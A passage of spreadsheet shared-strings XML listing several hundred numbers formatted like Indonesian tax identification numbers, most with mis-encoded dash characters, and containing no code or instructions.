    <t>01‚Äì533‚Äì810‚Äì6‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>78‚Äì655‚Äì804‚Äì9‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì973‚Äì569‚Äì5‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì076‚Äì4‚Äì123‚Äì001</t>
  </si>
  <si>
    <t>87‚Äì919‚Äì147‚Äì6‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì109‚Äì114‚Äì7‚Äì616‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì438‚Äì579‚Äì0‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì545‚Äì429‚Äì5‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì178‚Äì516‚Äì7‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>85‚Äì754‚Äì782‚Äì2‚Äì424‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì820‚Äì886‚Äì1‚Äì424‚Äì000</t>
  </si>
  <si>
    <t>44‚Äì337‚Äì562‚Äì1‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì948‚Äì219‚Äì9‚Äì308‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì284‚Äì941‚Äì8‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì830‚Äì390‚Äì9‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì671‚Äì5‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>74‚Äì387‚Äì948‚Äì8‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì750‚Äì458‚Äì1‚Äì811‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì182‚Äì015‚Äì4‚Äì431‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì546‚Äì919‚Äì6‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì335‚Äì760‚Äì3‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì135‚Äì462‚Äì8‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>95.727.121.6-112.000</t>
  </si>
  <si>
    <t>15‚Äì368‚Äì333‚Äì9‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì644‚Äì605‚Äì4‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì272‚Äì337‚Äì5‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>04‚Äì016‚Äì569‚Äì8‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì601‚Äì190‚Äì6‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì805‚Äì431‚Äì4‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì453‚Äì749‚Äì4‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì429‚Äì465‚Äì6‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì178‚Äì422‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì690‚Äì360‚Äì9‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>88‚Äì134‚Äì245‚Äì5‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì447‚Äì629‚Äì8‚Äì006‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì585‚Äì177‚Äì0‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì655‚Äì506‚Äì6‚Äì061‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì584‚Äì427‚Äì7‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì662‚Äì475‚Äì2‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì408‚Äì925‚Äì9‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì804‚Äì434‚Äì4‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì226‚Äì544‚Äì0‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì212‚Äì403‚Äì4‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì089‚Äì076‚Äì1‚Äì325‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì069‚Äì312‚Äì5‚Äì723‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì011‚Äì520‚Äì8‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì741‚Äì323‚Äì1‚Äì912‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì304‚Äì727‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì718‚Äì012‚Äì9‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì000‚Äì590‚Äì6‚Äì824‚Äì001</t>
  </si>
  <si>
    <t>74‚Äì698‚Äì083‚Äì8‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì561‚Äì822‚Äì4‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì910‚Äì916‚Äì2‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì071‚Äì316‚Äì2‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì065‚Äì1‚Äì822‚Äì002</t>
  </si>
  <si>
    <t>74‚Äì571‚Äì372‚Äì7‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì260‚Äì781‚Äì4‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì327‚Äì162‚Äì9‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>49‚Äì946‚Äì953‚Äì4‚Äì502‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì850‚Äì552‚Äì4‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì235‚Äì795‚Äì6‚Äì012‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì882‚Äì739‚Äì4‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì226‚Äì556‚Äì4‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>15‚Äì975‚Äì424‚Äì1‚Äì731‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì422‚Äì864‚Äì4‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì885‚Äì237‚Äì0‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì280‚Äì990‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>36.707.093.5-642.000</t>
  </si>
  <si>
    <t>82‚Äì726‚Äì982‚Äì0‚Äì732‚Äì000</t>
  </si>
  <si>
    <t>75.916.396.7-225.000</t>
  </si>
  <si>
    <t>85‚Äì435‚Äì475‚Äì0‚Äì048‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì976‚Äì581‚Äì0‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì821‚Äì702‚Äì4‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì218‚Äì262‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì239‚Äì375‚Äì7‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì385‚Äì700‚Äì6‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì592‚Äì627‚Äì5‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì115‚Äì208‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì244‚Äì696‚Äì5‚Äì832‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì217‚Äì527‚Äì6‚Äì436‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì745‚Äì622‚Äì2‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì924‚Äì521‚Äì5‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì853‚Äì979‚Äì3‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì692‚Äì894‚Äì6‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì158‚Äì883‚Äì8‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>80.028.690.8-518.000</t>
  </si>
  <si>
    <t>26‚Äì525‚Äì720‚Äì4‚Äì422‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì680‚Äì123‚Äì5‚Äì647‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì807‚Äì688‚Äì5‚Äì031‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì639‚Äì436‚Äì6‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì303‚Äì838‚Äì0‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì864‚Äì094‚Äì4‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>84‚Äì743‚Äì114‚Äì5‚Äì832‚Äì000</t>
  </si>
  <si>
    <t>80-323-340‚Äì2‚Äì212‚Äì000</t>
  </si>
  <si>
    <t>24‚Äì107‚Äì612‚Äì4‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì234‚Äì079‚Äì6‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì423‚Äì955‚Äì6‚Äì702‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì774‚Äì921‚Äì7‚Äì511‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì980‚Äì430‚Äì4‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì832‚Äì746‚Äì0‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì237‚Äì678‚Äì2‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì673‚Äì060‚Äì5‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì649‚Äì133‚Äì1‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì312‚Äì421‚Äì3‚Äì545‚Äì500</t>
  </si>
  <si>
    <t>73‚Äì442‚Äì498‚Äì9‚Äì656‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì885‚Äì904‚Äì8‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì613‚Äì747‚Äì6‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì184‚Äì909‚Äì9‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì851‚Äì513‚Äì5‚Äì908‚Äì000</t>
  </si>
  <si>
    <t>03.117.835.3-061.000</t>
  </si>
  <si>
    <t>14‚Äì639‚Äì368‚Äì1‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì094‚Äì015‚Äì1‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì247‚Äì535‚Äì2‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì654‚Äì019‚Äì7‚Äì921‚Äì001</t>
  </si>
  <si>
    <t>82‚Äì191‚Äì806‚Äì7‚Äì305‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì573‚Äì843‚Äì8‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>21.821.107.6-804.000</t>
  </si>
  <si>
    <t>02‚Äì843‚Äì943‚Äì8‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì440‚Äì997‚Äì3‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì370‚Äì594‚Äì0‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì290‚Äì898‚Äì3‚Äì921‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì141‚Äì233‚Äì5‚Äì905‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì299‚Äì507‚Äì0‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì417‚Äì106‚Äì1‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì044‚Äì539‚Äì4‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>02.667.165.1-951.000</t>
  </si>
  <si>
    <t>01‚Äì618‚Äì707‚Äì2‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì439‚Äì379‚Äì4‚Äì823‚Äì001</t>
  </si>
  <si>
    <t>76‚Äì464‚Äì294‚Äì8‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì066‚Äì413‚Äì2‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì828‚Äì823‚Äì0‚Äì532‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì681‚Äì362‚Äì9‚Äì625‚Äì000</t>
  </si>
  <si>
    <t>91.732.421.2-922.000</t>
  </si>
  <si>
    <t>16‚Äì279‚Äì759‚Äì1‚Äì305‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì975‚Äì137‚Äì6‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>06‚Äì776‚Äì569‚Äì3‚Äì223‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì111‚Äì844‚Äì5‚Äì809‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì560‚Äì903‚Äì3‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì876‚Äì102‚Äì6‚Äì455‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì346‚Äì410‚Äì8‚Äì505‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì618‚Äì599‚Äì7‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì770‚Äì587‚Äì2‚Äì452‚Äì001</t>
  </si>
  <si>
    <t>71‚Äì700‚Äì855‚Äì0‚Äì405‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì648‚Äì565‚Äì8‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì460‚Äì067‚Äì1‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì309‚Äì254‚Äì9‚Äì624‚Äì001</t>
  </si>
  <si>
    <t>80‚Äì530‚Äì979‚Äì6‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì097‚Äì661‚Äì7‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì782‚Äì043‚Äì1‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì844‚Äì016‚Äì1‚Äì219‚Äì000</t>
  </si>
  <si>
    <t>46‚Äì516‚Äì864‚Äì9‚Äì915‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì612‚Äì520‚Äì6‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì742‚Äì259‚Äì2‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì559‚Äì791‚Äì0‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì206‚Äì389‚Äì3‚Äì609‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì452‚Äì484‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì643‚Äì025‚Äì9‚Äì831‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì020‚Äì024‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì662‚Äì504‚Äì3‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì407‚Äì440‚Äì5‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì571‚Äì747‚Äì6‚Äì071‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì526‚Äì648‚Äì2‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì149‚Äì384‚Äì4‚Äì019‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì013‚Äì235‚Äì7‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì772‚Äì600‚Äì6‚Äì202‚Äì000</t>
  </si>
  <si>
    <t>03.105.852.2-643.000</t>
  </si>
  <si>
    <t>02‚Äì750‚Äì763‚Äì1‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì249‚Äì304‚Äì6‚Äì324‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì601‚Äì001‚Äì0‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì821‚Äì310‚Äì8‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì001‚Äì195‚Äì6‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì095‚Äì225‚Äì8‚Äì225‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì199‚Äì104‚Äì0‚Äì455‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì278‚Äì337‚Äì9‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì792‚Äì896‚Äì1‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì753‚Äì614‚Äì3‚Äì732‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì881‚Äì473‚Äì2‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì235‚Äì733‚Äì2‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì301‚Äì202‚Äì3‚Äì545‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì620‚Äì199‚Äì1‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>04‚Äì097‚Äì930‚Äì4‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì356‚Äì473‚Äì3‚Äì213‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì192‚Äì968‚Äì2‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>02.565.592.9-955.000</t>
  </si>
  <si>
    <t>06‚Äì548‚Äì860‚Äì3‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì718‚Äì962‚Äì4‚Äì225‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì542‚Äì473‚Äì2‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì897‚Äì692‚Äì9‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì017‚Äì235‚Äì9‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì519‚Äì702‚Äì2‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>31.684.434.9-807.001</t>
  </si>
  <si>
    <t>01‚Äì996‚Äì232‚Äì3‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì437‚Äì344‚Äì1‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì685‚Äì880‚Äì9‚Äì524‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì637‚Äì999‚Äì0‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì832‚Äì681‚Äì9‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì318‚Äì292‚Äì6‚Äì953‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì252‚Äì3‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì703‚Äì987‚Äì9‚Äì606‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì521‚Äì928‚Äì2‚Äì412‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì682‚Äì242‚Äì4‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì672‚Äì109‚Äì6‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì734‚Äì437‚Äì2‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì022‚Äì357‚Äì2‚Äì024‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì658‚Äì848‚Äì5‚Äì914‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì454‚Äì019‚Äì9‚Äì325‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì939‚Äì256‚Äì0‚Äì942‚Äì000</t>
  </si>
  <si>
    <t>87‚Äì615‚Äì409‚Äì7‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì918‚Äì334‚Äì2‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì582‚Äì257‚Äì2‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì123‚Äì080‚Äì0‚Äì603‚Äì001</t>
  </si>
  <si>
    <t>90‚Äì681‚Äì328‚Äì2‚Äì305‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì652‚Äì491‚Äì4‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì761‚Äì870‚Äì1‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì639‚Äì342‚Äì0‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì428‚Äì280‚Äì7‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì666‚Äì894‚Äì9‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì640‚Äì457‚Äì8‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì301‚Äì729‚Äì0‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì233‚Äì064‚Äì3‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì319‚Äì701‚Äì8‚Äì913‚Äì001</t>
  </si>
  <si>
    <t>06‚Äì613‚Äì114‚Äì5‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì379‚Äì961‚Äì0‚Äì727‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì753‚Äì163‚Äì5‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì059‚Äì563‚Äì8‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì250‚Äì262‚Äì4‚Äì018‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì403‚Äì324‚Äì0‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì638‚Äì777‚Äì9‚Äì941‚Äì001</t>
  </si>
  <si>
    <t>76‚Äì840‚Äì075‚Äì6‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì293‚Äì348‚Äì0‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì076‚Äì484‚Äì0‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì592‚Äì206‚Äì3‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì677‚Äì628‚Äì9‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì472‚Äì929‚Äì0‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì318‚Äì513‚Äì0‚Äì427‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì132‚Äì586‚Äì5‚Äì435‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì579‚Äì838‚Äì3‚Äì518‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì189‚Äì030‚Äì7‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì889‚Äì389‚Äì8‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì807‚Äì473‚Äì8‚Äì613‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì900‚Äì450‚Äì8‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì486‚Äì986‚Äì8‚Äì619‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì511‚Äì639‚Äì8‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì039‚Äì424‚Äì0‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì134‚Äì702‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì511‚Äì718‚Äì7‚Äì724‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì489‚Äì833‚Äì9‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì588‚Äì366‚Äì3‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì019‚Äì085‚Äì0‚Äì903‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì897‚Äì815‚Äì5‚Äì608‚Äì000</t>
  </si>
  <si>
    <t>59‚Äì471‚Äì670‚Äì6‚Äì039‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì096‚Äì697‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì133‚Äì878‚Äì6‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì094‚Äì579‚Äì7‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì323‚Äì641‚Äì1‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>25‚Äì081‚Äì499‚Äì3‚Äì642‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì630‚Äì575‚Äì2‚Äì652‚Äì000</t>
  </si>
  <si>
    <t>92‚Äì457‚Äì262‚Äì1‚Äì435‚Äì000</t>
  </si>
  <si>
    <t>86‚Äì774‚Äì646‚Äì3‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì312‚Äì107‚Äì5‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì529‚Äì177‚Äì7‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì726‚Äì274‚Äì5‚Äì921‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì961‚Äì737‚Äì8‚Äì037‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì645‚Äì550‚Äì5‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì156‚Äì557‚Äì8‚Äì921‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì268‚Äì003‚Äì0‚Äì615‚Äì000</t>
  </si>
  <si>
    <t>91‚Äì120‚Äì468‚Äì3‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì856‚Äì305‚Äì3‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì526‚Äì958‚Äì2‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì810‚Äì467‚Äì6‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì332‚Äì469‚Äì2‚Äì922‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì257‚Äì834‚Äì7‚Äì657‚Äì001</t>
  </si>
  <si>
    <t>73‚Äì313‚Äì222‚Äì9‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì303‚Äì366‚Äì1‚Äì825‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì805‚Äì411‚Äì1‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì980‚Äì193‚Äì8‚Äì426‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì655‚Äì129‚Äì9‚Äì412‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì627‚Äì493‚Äì8‚Äì301‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì344‚Äì688‚Äì8‚Äì306‚Äì000</t>
  </si>
  <si>
    <t>25‚Äì275‚Äì233‚Äì2‚Äì124‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì651‚Äì067‚Äì7‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì348‚Äì835‚Äì0‚Äì914‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì184‚Äì219‚Äì4‚Äì327‚Äì000</t>
  </si>
  <si>
    <t>84.596.107.7-124.000</t>
  </si>
  <si>
    <t>82‚Äì763‚Äì301‚Äì7‚Äì412‚Äì000</t>
  </si>
  <si>
    <t>41.032.726.6-915.000</t>
  </si>
  <si>
    <t>31‚Äì269‚Äì082‚Äì9‚Äì407‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì718‚Äì622‚Äì2‚Äì624‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì521‚Äì836‚Äì8‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì385‚Äì961‚Äì4‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì643‚Äì278‚Äì8‚Äì311‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì377‚Äì085‚Äì7‚Äì416‚Äì000</t>
  </si>
  <si>
    <t>93.976.039.3-809.000</t>
  </si>
  <si>
    <t>81‚Äì843‚Äì192‚Äì6‚Äì309‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì111‚Äì469‚Äì1‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>32‚Äì297‚Äì674‚Äì9‚Äì614‚Äì001</t>
  </si>
  <si>
    <t>91‚Äì421‚Äì365‚Äì7‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì244‚Äì720‚Äì4‚Äì611‚Äì000</t>
  </si>
  <si>
    <t>85‚Äì369‚Äì350‚Äì5‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>90‚Äì559‚Äì672‚Äì2‚Äì201‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì296‚Äì045‚Äì2‚Äì902‚Äì000</t>
  </si>
  <si>
    <t>26‚Äì464‚Äì283‚Äì2‚Äì009‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì341‚Äì718‚Äì5‚Äì617‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì845‚Äì554‚Äì3‚Äì404‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì523‚Äì468‚Äì3‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì460‚Äì958‚Äì8‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì194‚Äì886‚Äì1‚Äì911‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì102‚Äì062‚Äì1‚Äì333‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì416‚Äì384‚Äì2‚Äì331‚Äì000</t>
  </si>
  <si>
    <t>IDM000820058</t>
  </si>
  <si>
    <t>92‚Äì568‚Äì581‚Äì0‚Äì122‚Äì000</t>
  </si>
  <si>
